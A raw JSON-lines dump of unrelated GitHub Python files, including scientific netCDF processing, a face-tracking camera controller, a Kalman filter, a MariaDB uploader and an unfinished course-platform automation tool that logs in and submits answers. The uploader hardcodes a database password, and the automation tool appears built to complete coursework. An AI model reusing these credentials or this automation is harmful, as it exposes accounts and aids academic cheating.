True:\r\n bottom_arr_1200 = [[0 for _ in range(len(b_1200[11:]))] for _ in range(len(arr_1200))]\r\n for j in range(len(b_1200[11:])): # wavelength\r\n for i in range(len(arr_1200)): # timesteps\r\n bottom_arr_1200[i][j] = np.mean(arr_1200[i, 87:105, 11+j])\r\n bottom_arr_1200 = np.asarray(bottom_arr_1200)\r\n \r\n \r\n bottom_arr_640 = [[0 for _ in range(len(b_640))] for _ in range(len(arr_640))]\r\n for j in range(len(b_640)): # wavelength\r\n for i in range(len(arr_640)): # timesteps\r\n bottom_arr_640[i][j] = np.mean(arr_640[i, 232:280, j])\r\n bottom_arr_640 = np.asarray(bottom_arr_640)\r\n\r\n bottom_arr_640 = interpolate(bottom_arr_640)\r\n print(bottom_arr_640.shape)\r\n \r\n print('bottom calcing finished')\r\n \r\n # top quarter\r\n if toprow == True:\r\n top_arr_1200 = [[0 for _ in range(len(b_1200[11:]))] for _ in range(len(arr_1200))]\r\n for j in range(len(b_1200[11:])): # wavelength\r\n for i in range(len(arr_1200)): # timesteps\r\n top_arr_1200[i][j] = np.mean(arr_1200[i, 279:297, 11+j])\r\n top_arr_1200 = np.asarray(top_arr_1200)\r\n \r\n \r\n top_arr_640 = [[0 for _ in range(len(b_640))] for _ in range(len(arr_640))]\r\n for j in range(len(b_640)): # wavelength\r\n for i in range(len(arr_640)): # timesteps\r\n top_arr_640[i][j] = np.mean(arr_640[i, 744:792, j])\r\n top_arr_640 = np.asarray(top_arr_640)\r\n\r\n top_arr_640 = interpolate(top_arr_640)\r\n print(top_arr_640.shape)\r\n \r\n print('top calcing finished')\r\n \r\n\r\n #---------------------------------------\r\n #create dataframe to convert to csv\r\n # currently only available for centerrow\r\n create_csv = False\r\n create_nc = True # just making sure it really is off for me. Beware if you want to create a csv.\r\n \r\n if create_csv == True:\r\n csv_filename = 'Eagle_Hawk_'+date_1200+'_'+start_time_1200[:2]+start_time_1200[3:5]+'hallo.csv'\r\n \r\n \r\n dicti = {}\r\n dicti['time'] = time_arr\r\n for i in range(len(b_640)):\r\n dicti[str(b_640[i])] = np.around(center_arr_640[:, i],2)\r\n \r\n for i in range(len(b_1200[11:])):\r\n dicti[str(b_1200[11+i])] = np.around(center_arr_1200[:, i],2)\r\n \r\n \r\n df = pd.DataFrame(dicti)\r\n df.to_csv(csv_filename, index=False)\r\n \r\n \r\n print('csv finished')\r\n \r\n #----------------------------------------\r\n #create netcdf\r\n datee = date_1200[:4]+date_1200[5:7]+date_1200[8:10]\r\n timee = start_time_1200[0:2]+start_time_1200[3:5]\r\n \r\n date_datetime = datetime.strptime(date_1200+' 00:00:00.00', '%Y-%m-%d %H:%M:%S.%f')\r\n \r\n # consider first_run_of_day\r\n \r\n if create_nc == True:\r\n \r\n ncfile = netCDF4.Dataset(output_folder_lm+'MOSAiC_ACA_Flight_'+ datee +ab+'_'+timee+'_EagleHawk_2Pixelrows_Radiances.nc', mode='w', format='NETCDF4')\r\n \r\n \r\n today = datetime.today()\r\n #create attributes\r\n ncfile.title = 'Combination of Aisa Eagle and Hawk spectrum'\r\n ncfile.subtitle = 'Radiance spectra along time averaged over pixels 232-280 for Eagle and 87-105 for Hawk, respectively 744-792 and 279-297'\r\n ncfile.mission = 'MOSAiC-ACA'\r\n ncfile.platform = 'Polar 5'\r\n ncfile.instrument = 'Aisa Eagle and Aisa Hawk'\r\n ncfile.flight_id = datee + ab\r\n ncfile.sourcefile = str(filename_640)+ ', ' +str(filename_1200)\r\n ncfile.date_last_revised = '...'\r\n ncfile.featureType = '...'\r\n ncfile.Conventions = '...'\r\n ncfile.version = '1.0'\r\n ncfile.history = 'acquired by MOSAiC-ACA as .raw-Files, processed by Michael Schäfer, formatted to netcdf by Lukas Monrad-Krohn'\r\n ncfile.file_created = 'File created by L. Monrad-Krohn (email: lm73code@studserv.uni-leipzig.de) [supervised by M. Klingebiel (email: marcus.klingebiel@uni-leipzig.de)] on '+today.strftime('%B %d, %Y')\r\n ncfile.institute = 'Leipzig Institute for Meteorology (LIM), Leipzig, Germany'\r\n \r\n #initialize dimensions\r\n time_dim = ncfile.createDimension('time', len(time_arr))\r\n wvl_dim = ncfile.createDimension('wvl', len(b2))\r\n \r\n #initialize variables\r\n time = ncfile.createVariable('time', np.float64, ('time',))\r\n time.units = 'seconds since 1970-01-01 00:00'#'+ date_1200 #1970-01-01 00:00' # seconds since str(time_arr[0])\r\n time.standard_name = 'time'\r\n time.long_name = 'Time in seconds since 1970-01-01 00:00' # str(time_arr[0])\r\n time.calendar = 'standard'\r\n time.axis = 'T'\r\n \r\n #dtime = ncfile.createVariable('dtime', 'S1', ('time',))\r\n #dtime.units = '%Y-%m-%d %H:%M:%S.%f'\r\n #dtime.standart_name = 'datetime format'\r\n #dtime.axis = 'T'\r\n \r\n wvl = ncfile.createVariable('wvl', np.float32, ('wvl',))\r\n wvl.units = 'nm (10^{-9} m)'\r\n wvl.standard_name = 'radiation_wavelengths'\r\n wvl.long_name = 'Wavelengths of the spectral channels'\r\n wvl.axis = 'L'\r\n\r\n if centerrow == True:\r\n rad = ncfile.createVariable('rad', np.float32, ('wvl', 'time', ))\r\n rad.units = '10^{-3} W m^{-2} sr^{-1} nm^{-1}'\r\n rad.standard_name = 'Radiance' #upwelling_radiance_per_unit_wavelength_in_air\r\n rad.long_name = 'spectral uppward Radiance measured inflight by Aisa Eagle (pixels 488-536) and Hawk (pixels 183-201)'\r\n\r\n if toprow == True:\r\n rad1 = ncfile.createVariable('rad1', np.float32, ('wvl', 'time', ))\r\n rad1.units = '10^{-3} W m^{-2} sr^{-1} nm^{-1}'\r\n rad1.standard_name = 'Radiance' #upwelling_radiance_per_unit_wavelength_in_air\r\n rad1.long_name = 'spectral uppward Radiance measured inflight by Aisa Eagle (pixels 232-280) and Hawk (pixels 87-105)'\r\n \r\n if bottomrow == True:\r\n rad2 = ncfile.createVariable('rad2', np.float32, ('wvl', 'time', ))\r\n rad2.units = '10^{-3} W m^{-2} sr^{-1} nm^{-1}'\r\n rad2.standard_name = 'Radiance'\r\n rad2.long_name = 'spectral uppward Radiance measured inflight by Aisa Eagle (pixels 744-792) and Hawk (pixels 279-297)'\r\n \r\n \r\n #time_delta = time_arr[:] - datetime(1970, 1, 1, 0, 0, 0, 0)#date_datetime #datetime(1970, 1, 1, 0, 0, 0, 0) # time_arr[0] for seconds since flightstart\r\n time_delta = [i.timestamp() for i in time_arr[:]]\r\n #time_delta = np.asarray([i.total_seconds() for i in time_delta])\r\n #time_delta = np.float32(time_delta)\r\n \r\n #dtime = [str(i) for i in time_arr]\r\n #dtime = np.array(dtime, dtype='object')\r\n #dtime_str = netCDF4.stringtochar(np.array(dtime, 'S26'))\r\n\r\n print(bottom_arr_640.shape, bottom_arr_1200.shape)\r\n print(top_arr_640.shape, top_arr_1200.shape)\r\n \r\n # concatenat arrays from Eagle and Hawk (real joining part)\r\n if centerrow == True:\r\n p_all_c = np.concatenate((center_arr_640, center_arr_1200[:,:]), axis=1)\r\n p_all_c = np.around(p_all_c, 2)\r\n p_all_c = np.float32(p_all_c)\r\n if bottomrow == True:\r\n p_all_b = np.concatenate((bottom_arr_640, bottom_arr_1200[:,:]), axis=1)\r\n p_all_b = np.around(p_all_b, 2)\r\n p_all_b = np.float32(p_all_b)\r\n if toprow == True:\r\n p_all_t = np.concatenate((top_arr_640, top_arr_1200[:,:]), axis=1)\r\n p_all_t = np.around(p_all_t, 2)\r\n p_all_t = np.float32(p_all_t)\r\n \r\n # wavelengths\r\n b2 = np.float32(b2)\r\n \r\n \r\n # write data to variables\r\n time[:] = time_delta\r\n #dtime[:] = dtime\r\n wvl[:] = b2\r\n if centerrow == True:\r\n rad[:] == np.transpose(p_all_c)\r\n if bottomrow == True:\r\n rad2[:] = np.transpose(p_all_b)\r\n if toprow == True:\r\n rad1[:] = np.transpose(p_all_t)\r\n \r\n # plot stuff to check if it is correct \r\n if createplot == True:\r\n create_plots(data_arr = rad, time_arr = time[:]-time[0], wavel_arr = wvl, times = times_to_plot, wavel = wvl_to_plot, date_of_flight=datee, time_of_flight=timee)\r\n create_plots(data_arr = rad, time_arr = time[:]-time[0], wavel_arr = wvl, times = times_to_plot, wavel = wvl_to_plot, date_of_flight=datee, time_of_flight=timee)\r\n create_plots(data_arr = rad, time_arr = time[:]-time[0], wavel_arr = wvl, times = times_to_plot, wavel = wvl_to_plot, date_of_flight=datee, time_of_flight=timee)\r\n\r\n \r\n ncfile.close()\r\n print('nc finished'+ str(num))\r\n \r\n \r\n\r\nprint(datetime.now()-runtime_start) # total runtime\r\n\r\n\r\n","repo_name":"lukasMK01/MOSAiC-ACA","sub_path":"spectralimager/join_EAGLE_HAWK.py","file_name":"join_EAGLE_HAWK.py","file_ext":"py","file_size_in_byte":22515,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"22539234214","text":"import cv2\r\nimport serial\r\n\r\nscreen_width = 1920\r\nscreen_height = 1080\r\n\r\nser: object = serial.Serial('COM3', baudrate = 9600, timeout=0)\r\n\r\n#BOUNDARY SHAPE DRAWER\r\ndef draw_boundary(img, classifier, scaleFactor, minNeighbors, color, text):\r\n\r\n #converting images to grayscale\r\n gray_img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\r\n\r\n #importing face detection features for classification\r\n features = classifier.detectMultiScale(gray_img, scaleFactor, minNeighbors)\r\n\r\n #creating array for storing shape objects\r\n coords = []\r\n\r\n #initiating loop for drawing shapes for each image parameter at a time\r\n for (x, y, w, h) in features:\r\n cv2.rectangle(img, (x,y), (x+w,y+h), color, 2)\r\n cv2.putText(img, text, (x, y-4), cv2.FONT_HERSHEY_SIMPLEX, 0.8, color, 1, cv2.LINE_AA)\r\n coords = [x, y, w, h]\r\n\r\n #returning drawed shapes for each image parameter at a time\r\n return coords\r\n\r\n#SETTING PARAMETERS FOR CLASSIFICATION\r\ndef detect(img, faceCascade):\r\n\r\n #creating color object\r\n color = {\"blue\": (255,0,0), \"white\":(255,255,255),\"red\":(0,0,255), \"green\":(0,255,0)}\r\n\r\n #drawing boundary for array elements and changing captured images with added shapes\r\n coords = draw_boundary(img, faceCascade, 1.1, 10, color['white'], \"TARGET\")\r\n\r\n #runing code below if coords array is succesfully impelented for 4 elements\r\n if len(coords) == 4:\r\n img[coords[1]:coords[1]+coords[3], coords[0]:coords[0]+coords[2]]\r\n\r\n circleThickness = 2\r\n\r\n face_center_x = coords[0] + (coords[2]//2)\r\n face_center_y = coords[1] + (coords[3]//2)\r\n cv2.circle(img, ((face_center_x), (face_center_y)), 2, color['red'], circleThickness)\r\n if (width // 2) > face_center_x + 20:\r\n print('x-')\r\n ser.write(b'1')\r\n elif (width // 2) < face_center_x - 20:\r\n print('x+')\r\n ser.write(b'2')\r\n elif face_center_x - 20 <= width // 2 <= face_center_x + 20:\r\n print('x0')\r\n if (height // 2) > face_center_y + 20:\r\n print('y+')\r\n ser.write(b'3')\r\n elif (height // 2) < face_center_y - 20:\r\n print('y-')\r\n ser.write(b'4')\r\n elif face_center_y - 20 <= height // 2 <= face_center_y + 20:\r\n print('y0')\r\n ser.write(b'5')\r\n else:\r\n ser.write(b'5')\r\n #returning resulting images\r\n return img\r\n\r\n#CREATING SEGMENTATION OBJECTS FOR CLASSIFICATION USING PRECALCULATED MODELS\r\nfaceCascade = cv2.CascadeClassifier(\"haarcascade_frontalface_default.xml\")\r\n\r\n#CREATING CAMERA OBJECT AND INITIATING CAMERA\r\nvideo_capture = cv2.VideoCapture(1) #Change the number inside of VideoCapture() to change the camera\r\nvideo_capture.set(cv2.CV_CAP_PROP_FPS, 20)\r\n\r\ncv2.namedWindow('My Window',cv2.WINDOW_KEEPRATIO)\r\ncv2.setWindowProperty('My Window',cv2.WND_PROP_ASPECT_RATIO,cv2.WINDOW_KEEPRATIO)\r\ncv2.setWindowProperty('My Window',cv2.WND_PROP_FULLSCREEN,cv2.WINDOW_FULLSCREEN)\r\n\r\n#PRINTING ERROR IF CAMERA OBJECT CREATION IS FAILED\r\nif not video_capture.isOpened():\r\n print(\"Cannot open camera\")\r\n exit()\r\n\r\nvideo_capture.set(cv2.CAP_PROP_FRAME_WIDTH, screen_width)\r\nvideo_capture.set(cv2.CAP_PROP_FRAME_HEIGHT, screen_height)\r\n\r\n#STARTING INFINITE LOOP FOR SYSTEM\r\nwhile True:\r\n\r\n # reading camera object as an image stream\r\n ret, img = video_capture.read()\r\n\r\n #if frame is read correctly ret is True (ret is video stream object)\r\n if not ret:\r\n print(\"Can't receive frame (stream end?). Exiting ...\")\r\n #exit from infinite loop if camera stream capture failed\r\n break\r\n\r\n #segmentation of parts using precalculated models\r\n img = detect(img, faceCascade)\r\n\r\n height, width, channels = img.shape\r\n\r\n lineThickness = 1\r\n cv2.line(img, (0, height//2), (width, height//2), (0, 255, 0), lineThickness)\r\n cv2.line(img, (width//2, 0), (width//2, height), (0, 255, 0), lineThickness)\r\n\r\n #showing segmented image on screen continuously (real-life)\r\n cv2.imshow(\"My Window\", img)\r\n\r\n #waiting for Q button press, if Q is pressed break the loop\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\nser.write(b'5')\r\n\r\n#DESTROYING CAMERA OBJECT FOR CLEARING MEMORY\r\nvideo_capture.release()\r\n\r\n#DESTROYING IMAGE WINDOWS FOR CLEARING MEMORY\r\ncv2.destroyAllWindows()","repo_name":"EmreAlbayrak/Face-Tracking-Pan-Tilt","sub_path":"facedetect.py","file_name":"facedetect.py","file_ext":"py","file_size_in_byte":4377,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"52"} +{"seq_id":"38622289522","text":"import numpy as np\n\nclass KalmanFilter(object):\n def __init__(self, X):\n self.A = np.array([[1,1],[0,1]])\n self.P = np.diag((0.01, 0.01))\n self.Q = 0.01 * np.eye(X.shape[0]) \n self.H = np.array([[1, 0]]) \n self.R = np.eye(self.H.shape[0])\n self.X = X\n\n def kf_run_iter(self, Y):\n X,P = self.kf_predict()\n self.X,self.P = self.kf_update(X, P, Y)\n return self.X\n\n def kf_predict(self): \n X = np.dot(self.A, self.X) \n P = np.dot(self.A, np.dot(self.P, self.A.T)) + self.Q \n return X,P \n\n def kf_update(self, X, P, Y): \n IM = np.dot(self.H, X) # 1x1\n IS = self.R + np.dot(self.H, np.dot(P, self.H.T)) # 1x1\n K = np.dot(P, np.dot(self.H.T, np.linalg.inv(IS))) # 2x1\n X = X + np.dot(K, (Y-IM)) \n P = P - np.dot(K, np.dot(IS, K.T)) \n #LH = self.gauss_pdf(Y, IM, IS) \n return X,P \n\n def gauss_pdf(self, X, M, S): \n if M.shape[1] == 1: \n DX = X - np.tile(M, X.shape[1]) \n E = 0.5 * np.sum(DX * (np.dot(np.linalg.inv(S), DX)), axis=0) \n E = E + 0.5 * M.shape[0] * np.log(2 * np.pi) + 0.5 * np.log(np.linalg.det(S)) \n P = np.exp(-E) \n elif X.shape[1] == 1: \n DX = np.tile(X, M.shape[1])- M \n E = 0.5 * np.sum(DX * (np.dot(np.linalg.inv(S), DX)), axis=0) \n E = E + 0.5 * M.shape[0] * np.log(2 * np.pi) + 0.5 * np.log(np.linalg.det(S)) \n P = np.exp(-E)\n else: \n DX = X-M \n E = 0.5 * np.dot(DX.T, np.dot(np.linalg.inv(S), DX)) \n E = E + 0.5 * M.shape[0] * np.log(2 * np.pi) + 0.5 * np.log(np.linalg.det(S)) \n P = np.exp(-E) \n return (P[0],E[0])\n","repo_name":"arpitgit/Talk2dHand","sub_path":"kalman_filter.py","file_name":"kalman_filter.py","file_ext":"py","file_size_in_byte":1813,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"52"} +{"seq_id":"21719854836","text":"import csv\nimport glob\nimport os\n\nimport datetime\nimport mysql.connector as mariadb\n\nDB_USER='electricity'\nDB_PASSWORD='Abcdefg88'\nDB_TABLE_NAME = 'measurements'\n\n\ndef connect():\n mariadb_connection = mariadb.connect(host='192.168.1.84',\n user=DB_USER,\n password=DB_PASSWORD,\n database='electricity')\n return mariadb_connection\n\n\ndef setup_db(connection):\n try:\n cursor = connection.cursor()\n cursor.execute(\"\"\"\n CREATE TABLE IF NOT EXISTS `{table_name}` (\n `id` INT UNSIGNED NOT NULL AUTO_INCREMENT UNIQUE,\n `measured_at` DATETIME NOT NULL,\n `watts` DECIMAL(7, 2) UNSIGNED NOT NULL,\n PRIMARY KEY (`id`),\n INDEX `measured_at_idx` (`measured_at`)\n ) CHARACTER SET utf8;\n \"\"\".format(table_name=DB_TABLE_NAME))\n connection.commit()\n\n for result in cursor:\n print(result)\n\n except mariadb.Error as error:\n print('Error: {}'.format(error))\n\n\ndef _parse_row(row: dict):\n parsed_datetime = datetime.datetime.strptime(row['datetime'], '%Y-%m-%d %H:%M:%S')\n return (parsed_datetime, float(row['watts']))\n\n\ndef upload_file(connection, filepath):\n cursor = connection.cursor()\n\n with open(filepath, newline='') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n\n try:\n cursor.executemany(\"\"\"\n INSERT INTO `{table_name}` (measured_at, watts)\n VALUES (%s, %s);\n \"\"\".format(table_name=DB_TABLE_NAME), (_parse_row(row) for row in reader))\n except mariadb.Error as error:\n print('Error: {}'.format(error))\n\n connection.commit()\n\n\ndef find_all_files(base_dir):\n filepaths = glob.glob('{base_dir}/*/*/*-c.csv'.format(base_dir=base_dir))\n return sorted(filepaths)\n\n\nif __name__ == '__main__':\n connection = connect()\n setup_db(connection)\n for filepath in find_all_files('/Volumes/electricity/2018'):\n print('Uploading {}'.format(filepath))\n upload_file(connection, filepath)\n # upload_file(connection, os.path.join(os.path.dirname(__file__), 'watts-2018-11-17-c.csv'))\n connection.close()\n","repo_name":"halmhatt/electricity-arduino-meter","sub_path":"electricity-uploader/uploader.py","file_name":"uploader.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"4454372375","text":"\"\"\"empty message\n\nRevision ID: 138ad6638c1e\nRevises: 32ab43974f1a\nCreate Date: 2014-11-13 21:47:03.585013\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '138ad6638c1e'\ndown_revision = '32ab43974f1a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('user', sa.Column('uuid', sa.String(length=50), nullable=True))\n op.create_unique_constraint(None, 'user', ['uuid'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'user')\n op.drop_column('user', 'uuid')\n ### end Alembic commands ###\n","repo_name":"polaris340/hopping","sub_path":"migrations/versions/138ad6638c1e_.py","file_name":"138ad6638c1e_.py","file_ext":"py","file_size_in_byte":698,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"3820444286","text":"v_str = list(input())\nv_etalon_str = '+7(xxx)xxx-xx-xx'\nv_etalon_list = list(v_etalon_str)\nfl_val = 1\n\nfor i, v in enumerate(v_str):\n if i in (0, 1, 2, 6, 10, 13):\n if v != v_etalon_list[i]:\n fl_val = 0\n break\n else:\n if v < '0' or v > '9':\n fl_val = 0\n break\n\nprint('дю') if fl_val else print('мер')","repo_name":"letronas/Education","sub_path":"Stepik/Kind, Kind Python (Start Sergey Balakirev)/5.4.2.py","file_name":"5.4.2.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38965178532","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Mar 9 11:21:40 2018\r\n\r\n@author: Enrique\r\n\r\nThis file simply counts the tags in the specified file and is indented in blocks \r\nfor use with Spyder\r\n\"\"\"\r\n\r\nimport xml.etree.cElementTree as ET\r\nimport pprint\r\n\r\n#%%\r\n'''\r\nThis function iterates through the tree and builds a dictionary where keys\r\nare the tag names and the values are its ocurrences.\r\n'''\r\ndef count_tags(filename):\r\n tags = {}\r\n for event, elem in ET.iterparse(filename):\r\n tag_name = elem.tag\r\n if tag_name in tags:\r\n tags[tag_name] += 1\r\n else:\r\n tags[tag_name] = 1\r\n return tags\r\n\r\n#%%\r\n'''\r\nCreates a set of the users marked as such in the ET\r\n'''\r\ndef get_users(filename):\r\n users = set()\r\n for _, element in ET.iterparse(filename):\r\n users.add(element.get('user'))\r\n \r\n users.remove(None)\r\n return users\r\n\r\n#%%\r\nsample = 'bogota_sample.osm'\r\n\r\ntags = count_tags(sample)\r\npprint.pprint(tags)\r\n\r\n#%%\r\nusers = get_users(sample)\r\nprint(len(users))\r\n","repo_name":"kiquin/DAND","sub_path":"02/py extras/wrangling.py","file_name":"wrangling.py","file_ext":"py","file_size_in_byte":1035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36899508699","text":"import unittest\n\nimport torch\nfrom torch.nn import functional as F\nimport numpy as np\nfrom transformers import T5Tokenizer\n\nfrom exp.ours.data.dataset import Task\nfrom exp.ours.experimental.answer_masking import AnswerMask, TokenizedWordSearcher, AnswerMaskBuilder\n\n\nclass TestAnswerMasking(unittest.TestCase):\n\n def test_answer_mask_builder(self):\n tokenizer = T5Tokenizer.from_pretrained(\"t5-base\")\n builder = AnswerMaskBuilder.build(tokenizer)\n labels = [8, 1782, 3, 16287, 1] # =tokenizer.encode(\"the dog jumped\")\n mask = builder.build_mask([Task.CLS], torch.as_tensor([labels], dtype=torch.long))\n self.assertEqual(len(mask), 1)\n mask = mask[0]\n self.assertEqual(mask.apply_to.tolist(), [[0, 1]])\n\n labels = [8, 1782, 3, 16287, 1] # =tokenizer.encode(\"the dog jumped\")\n mask = builder.build_mask([Task.CLS], torch.as_tensor([labels], dtype=torch.long))\n self.assertEqual(len(mask), 1)\n mask = mask[0]\n self.assertEqual(mask.apply_to.tolist(), [[0, 1]])\n\n def test_word_searcher(self):\n searcher = TokenizedWordSearcher(\n [np.array(x) for x in [\n [0, 1, 2],\n [5],\n [5, 6, 7],\n [6]\n ]],\n # 6, 7, 8 do not end the previous word\n np.array([True, True, True, True, True, True, False, False, False])\n )\n self.assertEqual(searcher.find(np.array([0, 0, 0, 1, 2, 2, 0])), [(2, 5)])\n self.assertEqual(searcher.find(np.array([0, 0, 0, 1, 2, 2, 5])), [(2, 5), (6, 7)])\n self.assertEqual(searcher.find(np.array([5, 5, 6, 7])), [(0, 1), (1, 4)])\n self.assertEqual(searcher.find(np.array([5, 5, 6, 7, 8])), [(0, 1)])\n self.assertEqual(searcher.find(np.array([5, 8])), [])\n\n def test_answer_mask(self):\n mask = AnswerMask(\n redistribute_from=torch.as_tensor([2, 5]),\n redistribute_to=torch.as_tensor([0, 1, 3]),\n apply_to=torch.as_tensor([\n [0, 0],\n [0, 1]\n ]),\n )\n src_probs = torch.as_tensor([\n [0.1, 0.1, 0.1, 0.6, 0.1, 0.0],\n [0.15, 0.05, 0.3, 0.1, 0.3, 0.1],\n [0.15, 0.05, 0.3, 0.1, 0.3, 0.1]\n ]).unsqueeze(0)\n out = mask.apply(torch.log(src_probs))\n out_probs = F.softmax(out, -1).numpy()\n\n # 2 and 5 should be sent to zero\n self.assertTrue(np.allclose(out_probs[:, :2, 2], 0.))\n self.assertTrue(np.allclose(out_probs[:, :2, 5], 0.))\n\n # 4 should be unchanged\n self.assertTrue(np.allclose(out_probs[:, :2, 4], src_probs[:, :2, 4], rtol=0.0, atol=1e-6))\n\n # 0, 1, 3 should be increased by the correct constant\n factor1 = 0.9 / (0.9 - 0.1)\n for i in [0, 1, 3]:\n self.assertAlmostEqual(out_probs[0, 0, i], (src_probs[0, 0, i].item()*factor1))\n\n factor1 = 0.7 / (0.7 - 0.4)\n for i in [0, 1, 3]:\n self.assertAlmostEqual(out_probs[0, 1, i], (src_probs[0, 1, i].item()*factor1))\n\n # Entry 3 is unchanged\n self.assertAlmostEquals(out_probs[0, 2, i].tolist(), src_probs[0, 2, i].tolist())\n\n\nif __name__ == '__main__':\n TestAnswerMasking().test_answer_mask_builder()","repo_name":"michalsr/gpv","sub_path":"exp/ours_test/test_answer_mask.py","file_name":"test_answer_mask.py","file_ext":"py","file_size_in_byte":2975,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"35099134828","text":"import os\nimport sys\nimport time\nimport execjs\nimport requests\nfrom requests import exceptions as request_exceptions\nfrom requests_toolbelt.multipart.encoder import MultipartEncoder\nfrom MyLib.constants import TaskReturnMessage, Headers, AnswerPathAndUploadUrl, BrushClassUrl\nfrom MyLib.parse import AnswerResponseParse, BrushClassResponseParse\nfrom MyLib.settings import ResourcePath\n\n\nclass YkLogin(object):\n def __init__(self, username, password, common_function):\n self.common_headers = Headers.CommonHeaders.value\n self.login_url = AnswerPathAndUploadUrl.items.value['url']['loginUrl']\n self.username = username\n self.password = password\n self.common_function = common_function\n self.request_service = RequestService(self.username, self.common_function)\n\n def login(self, log_print=None):\n token = 'null'\n form_data = {\n 'imageValidCode': \"\", 'loginType': 1, 'orgId': 260,\n 'passwd': self.common_function.jsEncrypt.call('AES_Encrypt', self.password),\n 'rentId': 179, 'userName': self.username\n }\n params = {'data': form_data, 'parameter_mode': 'json', 'headers': self.common_headers}\n request_result = self.request_service.request(url=self.login_url, method='POST', time_sleep=1.5, items=params)\n if request_result['status'] is True and request_result['response'].json():\n login_response = request_result['response']\n if login_response.json()['code'] == 'REQ001':\n token = login_response.json()['data']['token']\n content = f\"userName:{self.username} Token:{token} - {login_response.json()['msg']}\\n\"\n log_content = self.common_function.get_log_item(\n content=content, one=self.username, four='登录成功', five=f\"token:{token}\"\n )\n else:\n content = f\"userName:{self.username} Token:{token} - {login_response.json()['msg']}\\n\"\n log_content = self.common_function.get_log_item(\n content=content, one=self.username, four='登录失败', five=login_response.json()['msg']\n )\n else:\n content = f\"userName:{self.username} Token:{token} - 连续请求不成功\\n\"\n log_content = self.common_function.get_log_item(\n content=content, one=self.username, four='登录失败', five=f\"连续请求不成功\"\n )\n self.common_function.logger_print(log_content, log_print)\n return token\n\n\nclass RequestService(object):\n def __init__(self, username, common_function):\n self.username = username\n self.common_function = common_function\n\n def request(self, url, method='GET', time_sleep=1.25, max_retry=3, items=None):\n request_result = {'status': False}\n try:\n time.sleep(time_sleep)\n headers = items['headers']\n if method == 'GET':\n response = requests.get(url=url, headers=headers, timeout=5)\n elif method == 'POST' and items['parameter_mode'] == 'json':\n response = requests.post(url=url, headers=headers, json=items['data'], timeout=5)\n elif method == 'POST' and items['parameter_mode'] == 'data':\n response = requests.post(url=url, headers=headers, data=items['data'], timeout=5)\n response.raise_for_status() # 如果响应码不为 200,抛出异常\n request_result['status'] = True\n request_result['response'] = response\n return request_result\n except request_exceptions.ConnectTimeout:\n log_content = self.common_function.get_log_item(\n content=f'{url}-请求失败 ConnectTimeout!\\n', one=self.username, four='请求失败 ConnectTimeout', five=url\n )\n self.common_function.logger_print(log_content)\n except request_exceptions.RequestException:\n log_content = self.common_function.get_log_item(\n content=f'{url}-请求失败 RequestException!\\n', one=self.username, four='请求失败 RequestException', five=url\n )\n self.common_function.logger_print(log_content)\n if max_retry > 0:\n return self.request(url=url, method=method, time_sleep=time_sleep, max_retry=max_retry - 1, items=items)\n return request_result\n\n\nclass CommonFunction(object):\n def __init__(self, qt_gui=None):\n self.qt_gui = None if qt_gui is None else qt_gui\n self.js_file_dir = ResourcePath.JsAesEncryptFilePath.value\n with open(file=self.js_file_dir, mode='r', encoding='utf-8') as fis:\n js_code = fis.read()\n self.jsEncrypt = execjs.compile(js_code)\n self.everyday_token_path = ResourcePath.TokenPath.value\n\n def get_log_item(self, content='null', one='null', two='null', three='null', four='null', five='null'):\n Log_item = {\n 'content': f\"{content}\",\n 'loggerItem': {\n 'one': one, 'two': two, 'three': three, 'four': four, 'five': five\n }\n }\n return Log_item\n\n def logger_print(self, item, route_key=None):\n if self.qt_gui is None:\n print(item['content'], end='')\n elif route_key is None:\n self.qt_gui.logger_output(item['loggerItem'], 'answer')\n elif route_key == 'info_find':\n self.qt_gui.logger_output(item['loggerItem'], route_key)\n elif route_key == 'brush_class':\n self.qt_gui.logger_output(item['loggerItem'], route_key)\n\n def get_token_list(self, account_ls, log_print=None):\n \"\"\" 获取token \"\"\"\n exists_token_list = self.qt_gui.pipeline_read.read_everyday_token(self.everyday_token_path)\n exists_token_item = dict()\n for item in exists_token_list:\n exists_token_item[item['username']] = item['token']\n save_status = False\n token_ls = list()\n for item in account_ls[:6]:\n username = item['username']\n password = item['password']\n if username in exists_token_item:\n token_ls.append(\n {'username': username, 'password': password, 'token': exists_token_item[username]}\n )\n continue\n token = YkLogin(username, password, self).login(log_print)\n if token is False:\n continue\n token_ls.append({'username': username, 'password': password, 'token': token}) # 返回指定账户的token\n exists_token_list.append({'username': username, 'password': password, 'token': token}) # 写入所有的token\n save_status = True\n if save_status:\n self.qt_gui.pipeline_save.json_save(file_path=self.everyday_token_path, token_list=exists_token_list)\n return token_ls\n\n def file_exists(self, username, course_title, task_name, file_path):\n if os.path.exists(file_path) is False:\n content = f\"{username} {course_title} {task_name} {file_path} - 文件不存在\\n\"\n log_content = self.get_log_item(content=content, one=username, two=course_title, three=task_name,\n four='文件不存在', five=file_path\n )\n self.logger_print(log_content)\n return {'taskStatus': False, 'msg': f\"文件不存在:{file_path}\"}\n return TaskReturnMessage.FileExists.value\n\n\nclass AnswerTaskRequest(object):\n def __init__(self, params_items):\n self.account_items = params_items['account_items']\n self.qt_gui = params_items['qt_gui']\n self.answer_directory_path = 